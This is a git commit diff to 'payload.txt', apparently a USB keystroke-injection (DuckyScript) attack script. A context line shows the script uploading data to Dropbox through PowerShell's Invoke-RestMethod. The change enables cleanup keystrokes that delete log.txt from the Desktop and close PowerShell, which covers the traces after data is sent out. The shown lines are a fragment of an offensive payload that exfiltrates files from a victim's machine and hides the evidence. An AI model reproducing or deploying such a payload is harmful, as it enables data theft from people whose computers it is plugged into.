Update payload.txt

pull/121/head
ph3llin 2022-08-15 19:56:10 -07:00 committed by GitHub
parent ba0888bbd4
commit be741790a0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 8 deletions

View File

@ -32,11 +32,14 @@ STRING $response = Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files
ENTER
DELAY 100
REM bottom code with delete log.txt and exit powershell
# STRING cd $env:USERPROFILE\Desktop
# ENTER
# DELAY 100
# STRING del log.txt
# ENTER
# DELAY 100
# STRING exit
# ENTER
STRING cd $env:USERPROFILE\Desktop
ENTER
DELAY 100
STRING del log.txt
ENTER
DELAY 100
STRING exit
ENTER
DELAY 100
STRING exit
ENTER